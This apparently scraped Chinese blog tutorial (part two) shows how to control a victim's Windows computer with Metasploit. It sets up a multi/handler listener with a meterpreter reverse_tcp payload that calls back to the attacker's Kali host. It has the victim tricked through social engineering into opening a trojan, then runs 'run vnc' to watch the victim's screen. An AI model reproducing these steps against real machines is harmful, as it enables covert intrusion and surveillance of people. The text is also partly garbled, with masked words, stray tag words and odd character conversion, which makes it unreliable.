網絡安全工程師演示:原來***是這樣控制你的計算機的!(下)

課前聲明:
一、本分享僅作學習交流,請自覺遵照法律法規!
二、搜索:Kali 與編程,學習更多網絡***乾貨!
三、Kali 與編程天天準時更新,敬請學習和關注!
正文部分
1、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫作The Metasploit Framework,簡稱叫作MSF。Metasploit做爲全球最受歡迎的工具,不單單是由於它的方便性和強大性,更重要的是它的框架。它容許使用者開發本身的漏洞腳本,從而進行測試。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主機呢?接下來讓咱們一塊兒學習!
2、資源裝備
1.安裝好且已經被安裝***的Win7虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
3、戰略安排
3.1 利用Metasploit(msf)***框架對目標受害者主機進行***控制,以下圖所示。
步驟1:開啓Metasploit(msf)***測試框架,以下圖所示。
命令:msfconsole
在這裏插入圖片描述編程

步驟2:使用對應的漏洞利用模塊,以下圖所示。(固然你也能夠利用search命令檢索對應的漏洞進行利用)
命令:use exploit/multi/handler
在這裏插入圖片描述windows

步驟3:設置payload鏈接方式,以下圖所示。
命令:set payload windows/meterpreter/reverse_tcp
在這裏插入圖片描述網絡

步驟4:查看***模塊須要設置的參數,以下圖所示。
命令:show options
在這裏插入圖片描述session

步驟5:須要設置的***參數以下圖所示。
Lhost:***者主機IP地址。
在這裏插入圖片描述框架

步驟6:查看***者主機(Kali主機)的IP地址,以下圖所示。
命令:ifconfig
在這裏插入圖片描述tcp

步驟7:設置對應的參數,以下圖所示。
這裏以設置lhost(***者主機IP)舉例
命令:set lhost IP
例子:set lhost 192.168.78.144
在這裏插入圖片描述ide

步驟8:查看對應的參數是否設置成功,以下圖所示。
命令:show options
在這裏插入圖片描述工具

步驟9:運行***模塊,以下圖所示。
命令:run
在這裏插入圖片描述學習

3.2 利用社會工程學相關手段誘導受害者主機使用者啓動其主機已經下載的***文件(這裏作實驗就直接進入受害者主機雙擊打開),以下圖所示。
在這裏插入圖片描述測試

3.3 以下圖所示,在Kali***者主機生成了對應的session會話。
在這裏插入圖片描述

3.4 利用***控制受害者主機,以下圖所示。
步驟1:運行vnc程序監控目標主機,以下圖所示。
命令:run vnc
在這裏插入圖片描述

步驟2:以下圖所示,運行命令後對應的監控畫面顯示到kali主機中,能夠監控受害者主機的一舉一動。
在這裏插入圖片描述
在這裏插入圖片描述
小編一個個字敲打創做,可辛苦了,問君能否關注一下我呢?你還可搜索:Kali與編程,學習更多******技巧呢 !拒絕盜版,轉載請聲明來源:Kali與編程
點我學習更多Kali Linux***測試與網絡***實戰技巧!

相關文章
相關標籤/搜索